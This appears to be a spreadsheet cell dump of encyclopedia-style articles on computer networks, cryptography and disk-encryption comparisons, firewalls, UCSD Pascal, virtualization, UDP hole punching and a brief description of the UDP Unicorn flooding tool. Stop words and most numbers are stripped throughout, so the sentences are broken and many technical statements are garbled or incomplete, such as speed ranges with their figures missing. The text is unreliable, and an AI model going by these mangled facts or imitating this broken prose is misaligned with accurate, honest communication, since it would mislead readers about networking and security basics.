wildly different topologies technologies. address resolution routing means allow mapping fully connected overlay network underlying network. another example overlay network distributed hash table, maps keys nodes network. case, underlying network network, overlay network table (actually map) indexed keys. overlay networks also proposed improve internet routing, quality service guarantees achieve higher-quality streaming media. previous proposals intserv, diffserv, multicast seen wide acceptance largely require modification routers network. hand, overlay network incrementally deployed end-hosts running overlay protocol software, without cooperation internet service providers. overlay network control packets routed underlying network overlay nodes, control, example, sequence overlay nodes message traverses reaches destination. example, akamai technologies manages overlay network provides reliable, efficient content delivery kind multicast). academic research includes system multicast, resilient routing quality service studies, among others. network links transmission media (often referred literature physical medium) used link devices form computer network include electrical cable, optical fiber, free space. model, software handle media defined layers physical layer data link layer. widely adopted family uses copper fiber media local area network (lan) technology collectively known ethernet. media protocol standards enable communication networked devices ethernet defined ieee 802.3. wireless standards radio waves, others infrared signals transmission medium. power line communication uses building's power cabling transmit data. wired following classes wired technologies used computer networking. coaxial cable widely used cable television systems, office buildings, work-sites local area networks. transmission speed ranges million bits second million bits second. itu-t g.hn technology uses existing home wiring (coaxial cable, phone lines power lines) create high-speed local area network. twisted pair cabling used wired ethernet standards. typically consists pairs copper cabling utilized voice data transmission. wires twisted together helps reduce crosstalk electromagnetic induction. transmission speed ranges mbit/s gbit/s. twisted pair cabling comes forms: unshielded twisted pair (utp) shielded twisted-pair (stp). each form comes several category ratings, designed various scenarios. optical fiber glass fiber. carries pulses light represent data lasers optical amplifiers. some advantages optical fibers metal wires transmission loss immunity electrical interference. using dense wave division multiplexing, optical fibers simultaneously carry multiple streams data different wavelengths light, greatly increases rate data sent trillions bits second. optic fibers used long runs cable carrying high data rates, used undersea cables interconnect continents. there basic types fiber optics, single-mode optical fiber (smf) multi-mode optical fiber (mmf). single-mode fiber advantage able sustain coherent signal dozens even hundred kilometers. multimode fiber cheaper terminate limited hundred even dozens meters, depending data rate cable grade. wireless network connections established wirelessly using radio electromagnetic means communication. terrestrial microwave terrestrial microwave communication uses earth-based transmitters receivers resembling satellite dishes. terrestrial microwaves gigahertz range, limits communications line-of-sight. relay stations spaced approximately miles apart. communications satellites satellites also communicate microwave. satellites stationed space, typically geosynchronous orbit 35,400 (22,000 equator. these earth-orbiting systems capable receiving relaying voice, data, signals. cellular networks several radio communications technologies. systems divide region covered multiple geographic areas. each area served low-power transceiver. radio spread spectrum technologies wireless lans high-frequency radio technology similar digital cellular. wireless lans spread spectrum technology enable communication multiple devices limited area. ieee 802.11 defines common flavor open-standards wireless radio-wave technology known wi-fi. free-space optical communication uses visible invisible light communications. cases, line-of-sight propagation used, limits physical positioning communicating devices. extending internet interplanetary dimensions radio waves optical means, interplanetary internet. avian carriers humorous april fool's request comments, issued 1149. implemented real life 2001.the last cases large round-trip delay time, gives slow two-way communication prevent sending large amounts information (they high throughput). network nodes apart physical transmission media, networks built additional basic system building blocks, network interface controllers (nics), repeaters, hubs, bridges, switches, routers, modems, firewalls. particular piece equipment frequently contain multiple building blocks perform multiple functions. network interfaces network interface controller (nic) computer hardware connects computer network media ability process low-level network information. example, connector accepting cable, aerial wireless transmission reception, associated circuitry. ethernet networks, network interface controller unique media access control (mac) address—usually stored controller's permanent memory. avoid address conflicts network devices, institute electrical electronics engineers (ieee) maintains administers address uniqueness. size ethernet address octets. three significant octets reserved identify manufacturers. these manufacturers, using assigned prefixes, uniquely assign three least-significant octets every ethernet interface produce. repeaters hubs repeater electronic device receives network signal, cleans unnecessary noise regenerates signal retransmitted higher power level, side obstruction signal cover longer distances without degradation. twisted pair ethernet configurations, repeaters required cable runs longer meters. with fiber optics, repeaters tens even hundreds kilometers apart. repeaters work physical layer model still require small amount time regenerate signal. this cause propagation delay affects network performance affect proper function. result, many network architectures limit number repeaters used network, e.g., ethernet 5-4-3 rule. ethernet repeater multiple ports known ethernet hub. addition reconditioning distributing network signals, repeater assists collision detection fault isolation network. hubs repeaters lans largely obsoleted modern network switches. bridges switches network bridges network switches distinct forward frames ports involved communication whereas forwards ports. bridges ports switch thought multi-port bridge. switches normally numerous ports, facilitating star topology devices, cascading additional switches. bridges switches operate data link layer (layer model bridge traffic network segments form single local network. both devices forward frames data ports based destination address frame. they learn association physical ports addresses examining source addresses received frames forward frame necessary. unknown destination targeted, device broadcasts request ports except source, discovers location reply. bridges switches divide network's collision domain maintain single broadcast domain. network segmentation bridging switching helps break large, congested network aggregation smaller, efficient networks. routers router internetworking device forwards packets networks processing addressing routing information included packet. routing information often processed conjunction routing table. router uses routing table determine forward packets require broadcasting packets inefficient networks. modems modems (modulator-demodulator) used connect network nodes wire originally designed digital network traffic, wireless. carrier signals modulated digital signal produce analog signal tailored give required properties transmission. early modems modulated audio signals sent standard voice telephone line. modems still commonly used telephone lines, using digital subscriber line technology cable television systems using docsis technology. firewalls firewall network device software controlling network security access rules. firewalls inserted connections secure internal networks potentially insecure external networks internet. firewalls typically configured reject access requests unrecognized sources allowing actions recognized ones. vital role firewalls play network security grows parallel constant increase cyber attacks. communication protocols communication protocol rules exchanging information network. communication protocols various characteristics. they connection-oriented connectionless, circuit mode packet switching, hierarchical addressing flat addressing. protocol stack, often constructed model, communications functions divided protocol layers, layer leverages services layer lowest layer controls hardware sends information across media. protocol layering ubiquitous across field computer networking. important example protocol stack http (the world wide protocol) running (the internet protocols) ieee 802.11 (the wi-fi protocol). this stack used wireless router home user's personal computer user surfing web. there many communication protocols, described below. common protocols internet protocol suite internet protocol suite, also called tcp/ip, foundation modern networking. offers connection-less connection-oriented services inherently unreliable network traversed datagram transmission using internet protocol (ip). core, protocol suite defines addressing, identification, routing specifications internet protocol version (ipv4) ipv6, next generation protocol much enlarged addressing capability. internet protocol suite defining protocols internet. ieee ieee family ieee standards dealing local area networks metropolitan area networks. complete ieee protocol suite provides diverse networking capabilities. protocols flat addressing scheme. they operate mostly layers model. example, bridging (ieee 802.1d) deals routing ethernet packets using spanning tree protocol. ieee 802.1q describes vlans, ieee 802.1x defines port-based network access control protocol, forms basis authentication mechanisms used vlans (but also found wlans) home user sees user enter "wireless access key". ethernet ethernet family technologies used wired lans. described standards together called ieee 802.3 published institute electrical electronics engineers. wireless wireless based ieee 802.11 standards, also widely known wlan wifi, probably well-known member ieee protocol family home users today. ieee 802.11 shares many properties wired ethernet. sonet/sdh synchronous optical networking (sonet) synchronous digital hierarchy (sdh) standardized multiplexing protocols transfer multiple digital streams optical fiber using lasers. they originally designed transport circuit mode communications variety different sources, primarily support circuit-switched digital telephony. however, protocol neutrality transport-oriented features, sonet/sdh also obvious choice transporting asynchronous transfer mode (atm) frames. asynchronous transfer mode asynchronous transfer mode (atm) switching technique telecommunication networks. uses asynchronous time-division multiplexing encodes data small, fixed-sized cells. this differs protocols internet protocol suite ethernet variable-sized packets frames. similarities circuit packet switched networking. this makes good choice network must handle traditional high-throughput data traffic, real-time, low-latency content voice video. uses connection-oriented model virtual circuit must established endpoints actual data exchange begins. still plays role last mile, connection internet service provider home user. cellular standards there number different digital cellular standards, including: global system mobile communications (gsm), general packet radio service (gprs), cdmaone, cdma2000, evolution-data optimized (ev-do), enhanced data rates evolution (edge), universal mobile telecommunications system (umts), digital enhanced cordless telecommunications (dect), digital amps (is-136/tdma), integrated digital enhanced network (iden). routing routing process selecting network paths carry network traffic. routing performed many kinds networks, including circuit switching networks packet switched networks. packet-switched networks, routing protocols direct packet forwarding intermediate nodes. intermediate nodes typically network hardware devices routers, bridges, gateways, firewalls, switches. general-purpose computers also forward packets perform routing, though lack specialized hardware, offer limited performance. routing process directs forwarding basis routing tables, maintain record routes various network destinations. most routing algorithms network path time. multipath routing techniques enable multiple alternative paths. routing contrasted bridging assumption network addresses structured similar addresses imply proximity within network. structured addresses allow single routing table entry represent route group devices. large networks, structured addressing used routers outperforms unstructured addressing used bridging. structured addresses used internet. unstructured addresses used bridging ethernet similar local area networks. geographic scale networks characterized many properties features, physical capacity, organizational purpose, user authorization, access rights, others. another distinct classification method physical extent geographic scale. nanoscale networka nanoscale network components implemented nanoscale, including message carriers, leverages physical principles differ macroscale communication mechanisms. nanoscale communication extends communication small sensors actuators found biological systems also tends operate environments would harsh communication techniques. personal area networka personal area network (pan) computer network used communication among computers different information technological devices close person. some examples devices used personal computers, printers, machines, telephones, pdas, scanners, video game consoles. include wired wireless devices. reach typically extends meters. wired usually constructed firewire connections technologies bluetooth infrared communication typically form wireless pan. local area networka local area network (lan) network connects computers devices limited geographical area home, school, office building, closely positioned group buildings. each computer device network node. wired lans likely based ethernet technology. newer standards itu-t g.hn also provide create wired using existing wiring, coaxial cables, telephone lines, power lines.the defining characteristics lan, contrast wide area network (wan), include higher data transfer rates, limited geographic range, lack reliance leased lines provide connectivity. current ethernet ieee 802.3 technologies operate data transfer rates gbit/s, standardized ieee 2010. currently, gbit/s ethernet developed. connected using router. home area networka home area network (han) residential used communication digital devices typically deployed home, usually small number personal computers accessories, printers mobile computing devices. important function sharing internet access, often broadband service cable digital subscriber line (dsl) provider. storage area networka storage area network (san) dedicated network provides access consolidated, block-level data storage. sans primarily used make storage devices, disk arrays, tape libraries, optical jukeboxes, accessible servers devices appear like locally attached devices operating system. typically network storage devices generally accessible local area network devices. cost complexity sans dropped early 2000s levels allowing wider adoption across enterprise small medium-sized business environments. campus area networka campus area network (can) made interconnection lans within limited geographical area. networking equipment (switches, routers) transmission media (optical fiber, copper plant, cat5 cabling, etc.) almost entirely owned campus tenant/owner enterprise, university, government, etc.). example, university campus network likely link variety campus buildings connect academic colleges departments, library, student residence halls. backbone networka backbone network part computer network infrastructure provides path exchange information different lans subnetworks. backbone together diverse networks within building, across different buildings, wide area. example, large company might implement backbone network connect departments located around world. equipment ties together departmental networks constitutes network backbone. when designing network backbone, network performance network congestion critical factors take account. normally, backbone network's capacity greater individual networks connected another example backbone network internet backbone, massive, global system fiber-optic cable optical networking carry bulk data wide area networks (wans), metro, regional, national transoceanic networks. metropolitan area networka metropolitan area network (man) large computer network usually spans city large campus. wide area networka wide area network (wan) computer network covers large geographic area city, country, spans even intercontinental distances. uses communications channel combines many types media telephone lines, cables, airwaves. often makes transmission facilities provided common carriers, telephone companies. technologies generally function lower three layers reference model: physical layer, data link layer, network layer. enterprise private networkan enterprise private network network single organization builds interconnect office locations (e.g., production sites, head offices, remote offices, shops) share computer resources. virtual private networka virtual private network (vpn) overlay network links nodes carried open connections virtual circuits larger network (e.g., internet) instead physical wires. data link layer protocols virtual network said tunneled larger network case. common application secure communications public internet, need explicit security features, authentication content encryption. vpns, example, used separate traffic different user communities underlying network strong security features. best-effort performance defined service level agreement (sla) customer service provider. generally, topology complex point-to-point. global area networka global area network (gan) network used supporting mobile across arbitrary number wireless lans, satellite coverage areas, etc. challenge mobile communications handing user communications local coverage area next. ieee project 802, involves succession terrestrial wireless lans. organizational scope networks typically managed organizations them. private enterprise networks combination intranets extranets. they also provide network access internet, single owner permits virtually unlimited global connectivity. intranet intranet networks control single administrative entity. intranet uses protocol ip-based tools browsers file transfer applications. administrative entity limits intranet authorized users. most commonly, intranet internal organization. large intranet typically least server provide users organizational information. intranet also anything behind router local area network. extranet extranet network also administrative control single organization supports limited connection specific external network. example, organization provide access aspects intranet share data business partners customers. these entities necessarily trusted security standpoint. network connection extranet often, always, implemented technology. internet internetwork connection multiple different types computer networks form single computer network layering different networking software connecting together using routers. internet largest example internetwork. global system interconnected governmental, academic, corporate, public, private computer networks. based networking technologies internet protocol suite. successor advanced research projects agency network (arpanet) developed darpa united states department defense. internet utilizes copper communications optical networking backbone enable world wide (www), internet things, video transfer, broad range information services. participants internet diverse array methods several hundred documented, often standardized, protocols compatible internet protocol suite addressing system addresses) administered internet assigned numbers authority address registries. service providers large enterprises exchange information reachability address spaces border gateway protocol (bgp), forming redundant worldwide mesh transmission paths. darknet darknet overlay network, typically running internet, accessible specialized software. darknet anonymizing network connections made trusted peers sometimes called "friends" (f2f) using non-standard protocols ports. darknets distinct distributed peer-to-peer networks sharing anonymous (that addresses publicly shared), therefore users communicate little fear governmental corporate interference. network service network services applications hosted servers computer network, provide functionality members users network, help network operate. world wide web, e-mail, printing network file sharing examples well-known network services. network services (domain name system) give names addresses (people remember names like “nm.lan” better numbers like “210.121.67.18”), dhcp ensure equipment network valid address.services usually based service protocol defines format sequencing messages clients servers network service. network performance bandwidth bandwidth bit/s refer consumed bandwidth, corresponding achieved throughput goodput, i.e., average rate successful data transfer communication path. throughput affected technologies bandwidth shaping, bandwidth management, bandwidth throttling, bandwidth cap, bandwidth allocation (for example bandwidth allocation protocol dynamic bandwidth allocation), etc. stream's bandwidth proportional average consumed signal bandwidth hertz (the average spectral bandwidth analog signal representing stream) studied time interval. network delay network delay design performance characteristic telecommunications network. specifies latency data travel across network communication endpoint another. typically measured multiples fractions second. delay differ slightly, depending location specific pair communicating endpoints. engineers usually report maximum average delay, divide delay several parts: processing delay time takes router process packet header queuing delay time packet spends routing queues transmission delay time takes push packet's bits onto link propagation delay time signal propagate mediaa certain minimum level delay experienced signals time takes transmit packet serially link. this delay extended variable levels delay network congestion. network delays range milliseconds several hundred milliseconds. quality service depending installation requirements, network performance usually measured quality service telecommunications product. parameters affect typically include throughput, jitter, error rate latency. following list gives examples network performance measures circuit-switched network type packet-switched network, viz. atm: circuit-switched networks: circuit switched networks, network performance synonymous grade service. number rejected calls measure well network performing heavy traffic loads. other types performance measures include level noise echo. atm: asynchronous transfer mode (atm) network, performance meas</t>
  </si>
  <si>
    <t>Comparison of cryptography libraries</t>
  </si>
  <si>
    <t>tables compare cryptography libraries deal cryptography algorithms function calls supported features. cryptography libraries fips this table denotes, cryptography library provides technical requisites fips 140, status fips certification (according nist's cmvp search, modules process list implementation test list). operations operations include generation algorithms, exchange agreements public cryptography standards. public algorithms elliptic curve cryptography (ecc) support public cryptography standards hash functions comparison supported cryptographic hash functions. here hash functions defined taking arbitrary length message producing fixed size output virtually impossible recreating original message. algorithms comparison implementations message authentication code (mac) algorithms. short piece information used authenticate message—in words, confirm message came stated sender (its authenticity) changed transit (its integrity). block ciphers table compares implementations block ciphers. block ciphers defined deterministic operating number bits (termed block) using symmetric key. each block cipher broken possible sizes block cipher modes with. block cipher algorithms cipher modes stream ciphers table shows support various stream ciphers. stream ciphers defined using plain text digits combined pseudorandom cipher digit stream. stream ciphers typically faster block ciphers lower hardware complexity, susceptible attacks. hardware-assisted support these tables compare ability utilize hardware enhanced cryptography. using assistance specific hardware library achieve greater speeds improved security otherwise. smartcard, protocol support general purpose platform acceleration support code size code comment ratio portability references</t>
  </si>
  <si>
    <t>Comparison of disc image software</t>
  </si>
  <si>
    <t>this article comparison notable software applications access manipulate disk image files. compares disk image handling features. comparison criteria this article compares features: supported file formats capabilities software treat image format. capabilities creates? specifies whether application create disc image file, either capturing image actual disc, composing disc image file locally stored files empty disc image. modifies? specifies whether application able manipulate contents existing disc image file, including adding, changing deleting files within modifying disc image metadata. mounts? specifies whether application emulate optical disc drive. such application treats disc image file like virtual disc virtually inserts emulated virtual drive. writes/burns? specifies whether application write contents disk image file onto physical media (such optical disc, floppy disk, hard disk drive flash drive) create physical replica. extracts? specifies whether application copy files within disc image file somewhere else. supported file formats input format specifies types disc image formats application open. output format specifies types disc image formats application save comparison also disk image disk partitioning optical disc authoring list optical disc authoring software comparison disc authoring software comparison disk cloning software notes references</t>
  </si>
  <si>
    <t>UDP Unicorn</t>
  </si>
  <si>
    <t>unicorn free open source attack software. software attacks computer's network connection repeatedly sending packets garbage data. unicorn uses winsock create sockets send packets. features multithreaded flooder port scanner active connection monitor network information public address icmp send receive (ping) target random ports random packet sizes user friendly pre-installed list common protocols ability play music also flood attack denial service attack references external links unicorn sourceforge</t>
  </si>
  <si>
    <t>Comparison of disk encryption software</t>
  </si>
  <si>
    <t>this technical feature comparison different disk encryption software. background information operating systems features hidden containers: whether hidden containers encrypted container within another encrypted container existence container established) created deniable encryption. note modes operation like plain prone watermarking attacks others. pre-boot authentication: whether authentication required booting computer, thus allowing encrypt boot disk. single sign-on: whether credentials provided pre-boot authentication automatically user host operating system, thus preventing password fatigue reducing need remember multiple passwords. custom authentication: whether custom authentication mechanisms implemented third-party applications. multiple keys: whether encrypted volume active key. passphrase strengthening: whether strengthening used plain text passwords frustrate dictionary attacks, usually using pbkdf2. hardware acceleration: whether dedicated cryptographic accelerator expansion cards taken advantage trusted platform module: whether implementation cryptoprocessor. filesystems: what filesystems supported. two-factor authentication: whether optional security tokens (hardware security modules, aladdin etoken smart cards) supported (for example using pkcs#11) layering whole disk: whether whole physical disk logical volume encrypted, including partition tables master boot record. note imply encrypted disk used boot disk itself; refer pre-boot authentication features comparison table. partition: whether individual disk partitions encrypted. file: whether encrypted container stored file (usually implemented encrypted loop devices). swap space: whether swap space (called "pagefile" windows) encrypted individually/explicitly. hibernation file: whether hibernation file encrypted hibernation supported). modes operation different modes operation supported software. note encrypted volume mode operation. predictable ivs: (cipher block chaining) mode initialization vectors statically derived sector number secret; means re-used overwriting sector vectors easily guessed attacker, leading watermarking attacks. secret ivs: mode initialization vectors statically derived encryption sector number. secret, re-used overwrites. methods include essiv encrypted sector numbers (cgd). random per-sector keys: mode random keys generated sector written thus exhibit typical weaknesses re-used initialization vectors. individual sector keys stored disk encrypted master key. (see gbde details) lrw: liskov-rivest-wagner tweakable narrow-block mode, mode operation specifically designed disk encryption. superseded secure mode security concerns. xts: xex-based tweaked codebook mode (tcb) ciphertext stealing (cts), siswg (ieee p1619) standard disk encryption. authenticated encryption: protection ciphertext modification attacker also cold boot attack comparison encrypted external drives disk encryption software disk encryption theory list cryptographic file systems notes references external links diskcryptor truecrypt comparison diskcryptor truecrypt buyer's guide full disk encryption overview full-disk encryption, works, differs file-level encryption</t>
  </si>
  <si>
    <t>Comparison of encrypted external drives</t>
  </si>
  <si>
    <t>this technical feature comparison commercial encrypted external drives. background information ironkey acquired kingston technology february 2016 ironclad technology, secure type stick" (flash drive operating system included), runs ironkey drive. also known "turnkey solution", "plugs plays". operating systems features bootable: whether (with appropriate installed drive supporting bios computer) drive used boot computer. encryption type: type encryption used. certification: whether fips 140-2 similar validation passed. managed: whether enterprise level management software maintaining large numbers devices included. interface: list usb, firewire, esata, interfaces connection computer. capacity: maximum size drive available included software: list included software, excluding standard freeware trialware obtainable user. other features: other notable features differentiate device. also comparison disk encryption software disk encryption software notes references</t>
  </si>
  <si>
    <t>Comparison of file synchronization software</t>
  </si>
  <si>
    <t>glossary platform operating system software platform like java .net. edit conflict detection detect operation result data loss. file synchronization renames/moves propagate renaming/moving file/directory. this saves bandwidth remote systems increases analysis duration. commonly done calculating storing hash function digests files detect files different names, edit dates, etc., identical contents. programs support behave originally-named file/directory deleted newly named file/directory transmit "new" file again. version control revert precedent version file/directory. scheduling service automatically (via scheduler system service), manually sync. online storage online file storage option type network-attached storage sync. shares. only client needed needed install synchronizing software client side. server running arbitrary storage protocol like sftp, smb, nfs, etc. synchronization logic handled client. this generally good, cheap cloud storage usually allow users custom software storage server, provide access storage. free open source freeware this comparison freeware (proprietary software release free charge) file synchronization software. commercial this comparison commercial software field file synchronization. these programs provide full functionality payment. indicated, trialware provide functionality trial period; freemium, meaning freeware editions. also references further reading kerner, sean (2008-02-13). "get sync file syncing software". tom's guide. retrieved 2009-07-01. kerner, sean (2008-02-27). "syncing software redux: more options". tom's guide. retrieved 2009-07-01.</t>
  </si>
  <si>
    <t>Comparison of firewalls</t>
  </si>
  <si>
    <t>firewall software firewall appliances firewall rule-set appliance-utm filtering features comparison notes firewall rule-set advanced features comparison firewall's features comparison notes non-firewall extra features comparison these strictly firewall features, sometimes bundled firewall software appliance. features also marked "yes" external module installed meets criteria. notes also internet security comparison antivirus software next-generation firewall references</t>
  </si>
  <si>
    <t>Comparison of iSCSI targets</t>
  </si>
  <si>
    <t>iscsi target storage resource located iscsi server (more generally, potentially many instances iscsi storage nodes running server) "target". iscsi target usually represents hard disk storage, often accessed using ethernet-based network. comparison chart software packages available allow customer configure computer disk drives network interface iscsi target. references</t>
  </si>
  <si>
    <t>UCSD Pascal</t>
  </si>
  <si>
    <t>ucsd pascal pascal programming language system runs ucsd p-system, portable, highly machine-independent operating system. ucsd pascal first released 1977. developed university california, diego (ucsd). ucsd pascal p-system 1977, university california, diego (ucsd) institute information systems developed ucsd pascal provide students common environment could available microcomputers well campus pdp-11 minicomputers. operating system became known ucsd p-system. there three operating systems offered original first ucsd p-system, cp/m-86 two. vendor softech microsystems emphasized p-system's application portability, virtual machines cpus pc's release. predicted users would able applications purchased future computers running p-system; advertisements called "the universal operating system".pc magazine denounced ucsd p-system stating review context mba, written language, "simply produce good code". p-system sell well lack applications expensive choices. previously, offered ucsd p-system option displaywriter, 8086-based dedicated word processing machine. (the displaywriter's native operating system developed completely internally opened end-user programming.) notable extensions standard pascal include separately compilable units string type. some intrinsics provided accelerate string processing (e.g. scanning array particular search pattern); language extensions provided allow ucsd p-system self-compiling self-hosted. ucsd pascal based p-code machine architecture. contribution early virtual machines extend p-code away roots compiler intermediate language full execution environment. ucsd pascal p-machine optimized small microcomputers addressing restricted 16-bit (only memory). james gosling cites ucsd pascal influence (along smalltalk virtual machine) design java virtual machine.ucsd p-system achieved machine independence defining virtual machine, called p-machine pseudo-machine, many users began call "pascal-machine" like os—although ucsd documentation always used "pseudo-machine") instruction called p-code pseudo-code). ammann, student niklaus wirth, originally presented p-code thesis, ucsd implementation derived, zurich pascal-p implementation. ucsd implementation changed zurich implementation "byte oriented". ucsd p-code optimized execution pascal programming language. each hardware platform needed p-code interpreter program written port entire p-system tools later versions also included additional languages compiled p-code base. example, apple computer offered fortran compiler (written silicon valley software, sunnyvale california) producing p-code apple version p-system. later, telesoft (also located diego) offered early development environment used p-code therefore able number hardware platforms including motorola 68000, system/370, pascal microengine. ucsd p-system shares concepts later java platform. both virtual machine hide operating system hardware differences, programs written virtual machine provide cross-platform support. likewise systems allow virtual machine used either complete operating system target computer "box" another operating system. ucsd pascal compiler distributed part portable operating system, p-system. history ucsd p-system began around 1974 idea ucsd's kenneth bowles, believed number computing platforms coming time would make difficult programming languages gain acceptance. based ucsd pascal pascal-p2 release portable compiler zurich. particularly interested pascal language teach programming. ucsd introduced features important improvements original pascal: variable length strings, "units" independently compiled code idea included then-evolving programming language). niklaus wirth credits p-system, ucsd pascal particular, popularizing pascal. release turbo pascal ucsd's version started slip first place among pascal users. pascal dialect ucsd pascal came subset pascal implemented pascal-p2, designed full implementation language, rather "the minimum subset would self-compile", function bootstrap pascal compilers. ucsd added strings basic, several implementation dependent features. although ucsd pascal later obtained many features full pascal language, pascal-p2 subset persisted dialects, notably borland pascal, copied much ucsd dialect. versions there four versions ucsd p-code engine, several revisions p-system ucsd pascal. revision p-code engine (i.e., p-machine) meant change p-code language, therefore compiled code portable different p-machine versions. each revision represented leading roman numeral, operating system revisions enumerated "dot" number following p-code roman numeral. example, ii.3 represented third revision p-system running second revision p-machine. version original version, never officially distributed outside university california, diego. however, pascal sources versions freely exchanged interested users. specifically, patch revision i.5a known stable. version widely distributed, available many early microcomputers. numerous versions included apple pdp-11, zilog 6502 based machines, motorola 68000 (version restricted code segment stack/heap data segment; version removed code segment limit cost more). project members include kenneth bowles, mark allen, richard gleaves, richard kaufmann, pete lawrence, joel mccormack, mark overgaard, keith shillington, roger sumner, john zandt version custom version written western digital pascal microengine microcomputer. included support parallel processes first time. version commercial version, developed sold softech. based version include changes version iii. sell well combination pricing structure, performance problems p-code interpreter, competition native operating systems often ran). after softech dropped product, picked pecan systems, relatively small company formed p-system users fans. sales revived somewhat, mostly pecan's reasonable pricing structure, p-system ucsd pascal gradually lost market native operating systems compilers. available ti-99/4a equipped p-code card, commodore 8096, sage further corvus systems computer used ucsd pascal user software. "innovative concept" constellation pascal (interpretively compiled) include common software manual, users could modify needed. also p-code machine notes further reading foster, christine (september 2004). "ucsd pascal revolution". @ucsd. diego: ucsd alumni association. (3). archived original 2012-03-06. mcmillan, william (july 2011). "the soul virtual machine". ieee spectrum. ieee. (7): 44–49, 58–59. doi:10.1109/mspec.2011.5910448. issn 0018-9235. s2cid 40545952. hyde, randall (1983). p-source guide apple pascal system). datamost. isbn 0881900044. external links 2006, ucsd released portions p-system written june 1979, non-commercial use. (note: webpage resizes browser window.) ucsd pascal reunion, presentations videos ucsd pascal reunion held ucsd october 2004 powerpoint video "what heck ucsd pascal?," presented 2004 reunion video ucsd-psystem-os, cross-compilable source code ucsd p-system version ii.0 ucsd-psystem-vm, portable virtual machine ucsd p-system p-code reconstruction ucsd pascal system ii.0 user manual softech p-system disassembler ucsd p-system museum within jefferson computer museum ucsd p-system pascal small machines ucsd pascal yahoo group</t>
  </si>
  <si>
    <t>Comparison of platform virtualization software</t>
  </si>
  <si>
    <t>platform virtualization software, specifically emulators hypervisors, software packages emulate whole physical computer machine, often providing multiple virtual machines physical platform. table compares basic information platform virtualization hypervisors. general features providing virtual environment usually requires overhead type another. native usually means virtualization technique level virtualization (like bochs), executes code slowly directly executed cpu. some products vmware virtual similar approaches bochs qemu, however number advanced techniques shortcut calls directly (similar process compiler uses) bring speed near native cases. however, products colinux, xen, z/vm real mode) suffer cost cpu-level slowdowns cpu-level instructions proxied executing emulated architecture since guest hardware providing environment applications under. however access many resources system, devices memory proxied emulated order broker shared services guests, cause slow downs compared running outside virtualization. os-level virtualization described "native" speed, however groups found overhead high operations, generally figures come long secondary effects appear. paper comparing performance paravirtualization approaches (e.g. xen) os-level virtualization requires patches/recompiling. exceptional lightweight, paravirtualized, single-user vm/cms interactive shell: largest customers several thousand users even single prior models. multiprogramming oses like linux z/os make heavy native supervisor state instructions, performance vary depending nature workload near native. hundreds thousands linux guests possible single machine certain workloads. image type compatibility other features windows server 2008 windows limited support redirecting protocol using remotefx. windows server 2008 adds accelerated graphics support certain editions windows server 2008 windows using remotefx. restrictions this table meant outline restrictions software dictated licensing capabilities. note: limit means enforced limit. example, memory cannot host memory memory swap disk, limit physically. also list computer system emulators comparison application virtualization software comparison emulation virtualization apps android popek goldberg virtualization requirements virtual machine virtualization notes references</t>
  </si>
  <si>
    <t>UDP hole punching</t>
  </si>
  <si>
    <t>hole punching commonly used technique employed network address translation (nat) applications maintaining user datagram protocol (udp) packet streams traverse nat. traversal techniques typically required client-to-client networking applications internet involving hosts connected private networks, especially peer-to-peer, direct client-to-client (dcc) voice internet protocol (voip) deployments.udp hole punching establishes connectivity hosts communicating across network address translators. typically, third-party hosts public transit network used establish port states used direct communications communicating hosts. once port state successfully established hosts communicating, port state maintained either normal communications traffic, prolonged absence thereof, keep-alive packets, usually consisting empty packets packets minimal, non-intrusive content. overview hole punching method establishing bidirectional connections internet hosts private networks using network address translators. technique applicable scenarios types nats, operating characteristics standardized. hosts network connectivity inside private network connected internet typically session traversal utilities (stun) method interactive connectivity establishment (ice) determine public address communications peers require. process another host public network used establish port mapping port state assumed valid direct communication application hosts. since state usually expires short periods time range tens seconds minutes, port closed process, hole punching employs transmission periodic keep-alive packets, renewing life-time counters state machine nat. hole punching work symmetric devices (also known bi-directional nat) tend found large corporate networks. symmetric nat, nat's mapping associated connection well-known stun server restricted receiving data well-known server, therefore mapping well-known server sees useful information endpoint. somewhat elaborate approach hosts start sending other, using multiple attempts. restricted cone nat, first packet host blocked. after device record sent packet machine, packets coming address port number through. this technique widely used peer-to-peer software voice internet protocol telephony. also used assist establishment virtual private networks operating udp. technique sometimes extended transmission control protocol (tcp) connections, though less success connection streams controlled host application, sequence numbers selected randomly; thus device performs sequence-number checking consider packets associated existing connection drop them. flow hosts, private network; devices globally reachable addresses eipa eipb respectively; public server well-known, globally reachable address. begin conversation devices create translation states assign temporary external port numbers epb. examines packets source port used (the external ports epb). passes eipa:epa eipb:epb sends packet eipb:epb. examines packet creates following tuple translation table: (source-ip-a, epa, eipb, epb). sends packet eipa:epa. examines packet creates following tuple translation table: (source-ip-b, epb, eipa, epa). depending state na's translation table first packet arrives (i.e. whether tuple (source-ip-a, epa, eipb, epb) created time arrival first packet), first packet dropped entry translation table) passed (entry translation table made). depending state nb's translation table first packet arrives (i.e. whether tuple (source-ip-b, epb, eipa, epa) created time arrival first packet), first packet dropped entry translation table) passed (entry translation table made). worst, second packet reaches worst second packet reaches holes "punched" hosts directly communicate.if hosts restricted cone nats symmetric nats, external ports differ used routers, external ports picked sequentially, making possible establish conversation guessing nearby ports. also hamachi freenet icmp hole punching hole punching hole punching (networking) webrtc port control protocol (pcp) teredo tunneling references external links peer-to-peer communication across network address translators, contains detailed explanation hole punching process stunt simple traversal through nats network address translation peer-to-peer applications (natp2p)</t>
  </si>
  <si>
    <t>Comparison of privilege authorization features</t>
  </si>
  <si>
    <t>number computer operating systems employ security features help prevent malicious software gaining sufficient privileges compromise computer system. operating systems lacking features, dos, windows implementations prior windows (and descendants), cp/m-80, operating systems prior category user allowed anything. with separate execution contexts possible multiple users store private files, multiple users computer time, protect system malicious users, protect system malicious programs. first multi-user secure system multics, began development 1960s; unix, bsd, linux, late early multi-tasking security contexts brought consumer machines. introduction implementations microsoft windowsmac osunix unix-like security considerations falsified/intercepted user input major security consideration ability malicious applications simulate keystrokes mouse clicks, thus tricking spoofing security feature granting malicious applications higher privileges. using terminal based client (standalone within desktop/gui): sudo terminal, vulnerable spoofed input. course, user running multitasking environment (i.e. single user shell only), would problem. terminal windows usually rendered ordinary windows user, therefore intelligent client desktop system used client, user must take responsibility preventing malware desktop manipulating, simulating, capturing input. using gui/desktop tightly integrated operating system: commonly, desktop system locks secures common means input, requesting passwords authentication, cannot intercepted, manipulated, simulated:policykit (gnome directs server capture keyboard mouse input. other desktop environments using policykit mechanisms. gksudo default "locks" keyboard, mouse, window focus, preventing anything actual user inputting password otherwise interfering confirmation dialog. (windows) default runs secure desktop, preventing malicious applications simulating clicking "allow" button otherwise interfering confirmation dialog. mode, user's desktop appears dimmed cannot interacted with. either gksudo's "lock" 